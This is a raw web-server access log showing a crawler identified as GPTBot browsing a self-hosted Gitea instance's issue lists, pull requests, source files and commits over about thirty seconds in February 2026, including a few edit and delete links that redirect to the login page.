"https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py?display=source" [Client 74.7.227.38] [Length 17368] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:19:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11309] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:19:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:19:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol" [Client 74.7.227.38] [Length 49765] [Gzip 12.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:19:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11628] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" -[17/Feb/2026:19:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:13:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:13:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 